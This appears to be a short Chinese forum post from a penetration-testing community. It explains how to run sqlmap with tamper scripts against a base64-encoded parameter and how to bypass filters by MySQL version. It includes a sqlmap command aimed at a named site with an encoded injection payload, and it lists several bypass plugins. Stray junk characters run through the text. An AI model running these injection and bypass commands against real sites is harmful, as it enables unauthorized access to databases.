WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?& k, h9 Y6 ]* l sqlmap的tamper里有个base64encode.py + _: ~1 v& F/ r. _ 使用如下 sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”+ V F0 n2 \7 H; d' e; ]8 R * @7 Q6 I* R% ?2 K( }2 a6 A 其中常用到的bypass脚本绕过SQLMAP主要两个脚本: 9 T" P |0 }( a7 }' Z% J p' e( r space2hash.py ,对于MYSQL数据库 4.0, 5.0注入 space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入 首先确定目标数据库版本,然后选择相应的脚本。0 ?9 s- { k) C3 v. P b: | -v 3 --batch --tamper "space2hash.py" + X# D; M- f9 a9 y$ H7 O2 _! o! Y 还有其他一些插件:0 ~: ^! E1 n7 ^8 E. o encodes编码 ——charencode.py' k0 F. n! j4 T$ N base64编码 —— base64encode.py. L" b5 V. s6 B2 T+ C/ ?0 v 替换空格和关键字 —— halfversionedmorekeywords.py |
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |